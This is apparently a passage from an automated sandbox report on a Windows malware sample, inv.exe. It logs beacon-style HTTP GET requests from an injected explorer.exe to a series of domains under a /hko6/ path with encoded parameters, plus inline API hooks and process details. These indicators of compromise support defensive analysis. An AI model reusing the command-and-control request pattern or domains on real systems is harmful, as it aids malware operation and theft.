                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.749758173.192.101.24880C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:25:51.383757114 CET4474OUTGET /hko6/?3f_X=Q2J8lT4hKB4&rL0=/LbTQbSxfycNpyBkUl28ip4ahz0503SiTQiCvhPHWMRp7RgREL83brTbc+Xp5Y7hhpZ940oONw== HTTP/1.1
                                                                                      Host: www.mycapecoralhomevalue.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:25:51.522063017 CET4474INHTTP/1.1 400 Bad Request
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      X-AspNetMvc-Version: 5.2
                                                                                      X-Powered-By: ASP.NET
                                                                                      Date: Thu, 26 Nov 2020 07:25:51 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 296
                                                                                      Data Raw: 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 3c 70 3e 53 6f 72 72 79 2c 20 62 75 74 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>404 - Page Not Found</title> <link rel="stylesheet" href="/error/error.css" /></head><body> <h1>404</h1> <h2>Page Not Found</h2> <p>Sorry, but the page you are looking for does not exist.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.74975934.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:26:13.726460934 CET4476OUTGET /hko6/?rL0=EcalOYSyHuIWNe0yBiyzQnDoyWnQ8AXmuso6y7H91Y9cmoRSZtclvU9o5GCKwGOmvOmDBOYeyw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.nextgenmemorabilia.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:26:13.841572046 CET4476INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:26:13 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c9ca-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.749760184.168.131.24180C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:26:34.228813887 CET4477OUTGET /hko6/?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w== HTTP/1.1
                                                                                      Host: www.bitcoincandy.xyz
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:26:34.406599045 CET4478INHTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx/1.16.1
                                                                                      Date: Thu, 26 Nov 2020 07:26:34 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Location: https://allassetcoins.com/cipherdomains/orbitdex.html?3f_X=Q2J8lT4hKB4&rL0=tXOddRziBZnyKXnXE9Kw2rrsPuH0SCZGoRNpDj1avThKGPBCs+LEjAOKKARNXpDVSdN5zM8g6w==
                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.74976123.227.38.7480C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:26:54.667975903 CET4478OUTGET /hko6/?rL0=lnnZpxegrJKzTox397oQ7hMdCzz828WEhmoqeuNRxe7x8IdLeLrXs8RcdM6azEYnfszPY9qEDw==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.nairobi-paris.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:26:54.805349112 CET4480INHTTP/1.1 403 Forbidden
                                                                                      Date: Thu, 26 Nov 2020 07:26:54 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      X-Sorting-Hat-PodId: 148
                                                                                      X-Sorting-Hat-ShopId: 44763218069
                                                                                      X-Dc: gcp-us-central1
                                                                                      X-Request-ID: 2028a74b-b7b9-48b6-93d3-00e4e019a57b
                                                                                      X-Download-Options: noopen
                                                                                      X-Permitted-Cross-Domain-Policies: none
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      cf-request-id: 06a50bc0d200002bc61585c000000001
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 5f81e247b9b72bc6-FRA
                                                                                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74
                                                                                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-it


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.2.74976234.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:27:15.070194006 CET4486OUTGET /hko6/?3f_X=Q2J8lT4hKB4&rL0=aHVAadkazLcgpN8DfnkezNpyp51CrlFhObeUx/sqQ/l2/vvbNLM2LhcZi7UhlF8eqCKPkpMthw== HTTP/1.1
                                                                                      Host: www.multitask-improvements.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:27:15.187453032 CET4486INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:27:15 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c9ca-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.2.74976334.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:27:58.063796997 CET4487OUTGET /hko6/?3f_X=Q2J8lT4hKB4&rL0=unPaIt4Wrr/MPjhCprV+jqsEzE7JishdMJKNe650ko6TMe0TVWcSrCraL7NT+TIMSrZljLZXYg== HTTP/1.1
                                                                                      Host: www.affiliateclubindia.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:27:58.179707050 CET4488INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:27:58 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c734-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      8192.168.2.749767192.185.199.12980C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:28:18.988131046 CET4597OUTGET /hko6/?rL0=8oU9gQhEu+N8eeM1Y6MoxEZjlYuMVxPKauIzdp9CFrmDAuxODTg/6eGUiPSS+vrDP6XYMoMbRg==&3f_X=Q2J8lT4hKB4 HTTP/1.1
                                                                                      Host: www.chartershome.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:28:19.201641083 CET4598INHTTP/1.1 404 Not Found
                                                                                      Date: Thu, 26 Nov 2020 07:28:19 GMT
                                                                                      Server: Apache
                                                                                      Upgrade: h2,h2c
                                                                                      Connection: Upgrade, close
                                                                                      Last-Modified: Tue, 23 Apr 2019 06:15:09 GMT
                                                                                      Accept-Ranges: bytes
                                                                                      Content-Length: 11816
                                                                                      Vary: Accept-Encoding
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 67 61 74 6f 72 62 6f 74 74 6f 6d 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6c 65 66 74 3a 33 39 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 20 23 78 78 78 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 3a 34 30 70 78 20 33 39 37 70 78 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 61 75 74
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:39px;float:left;} #container #mid404 #xxx{float:left;padding:40px 397px 10px; margin: auto aut


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      9192.168.2.74977034.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Nov 26, 2020 08:28:39.575417995 CET4623OUTGET /hko6/?3f_X=Q2J8lT4hKB4&rL0=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+2P6aSZa1OhuyBgZWg== HTTP/1.1
                                                                                      Host: www.nationshiphop.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Nov 26, 2020 08:28:39.690175056 CET4623INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Thu, 26 Nov 2020 07:28:39 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "5fb7c734-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Code Manipulations

                                                                                      User Modules

                                                                                      Hook Summary

                                                                                      Function NameHook TypeActive in Processes
                                                                                      PeekMessageAINLINEexplorer.exe
                                                                                      PeekMessageWINLINEexplorer.exe
                                                                                      GetMessageWINLINEexplorer.exe
                                                                                      GetMessageAINLINEexplorer.exe

                                                                                      Processes

                                                                                      Process: explorer.exe, Module: user32.dll
                                                                                      Function NameHook TypeNew Data
                                                                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA
                                                                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA
                                                                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEA
                                                                                      GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEA

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: inv.exe PID: 5764 Parent PID: 5644

                                                                                      General

                                                                                      Start time:08:23:27
                                                                                      Start date:26/11/2020
                                                                                      Path:C:\Users\user\Desktop\inv.exe
                                                                                      Wow64 process (32bit):true
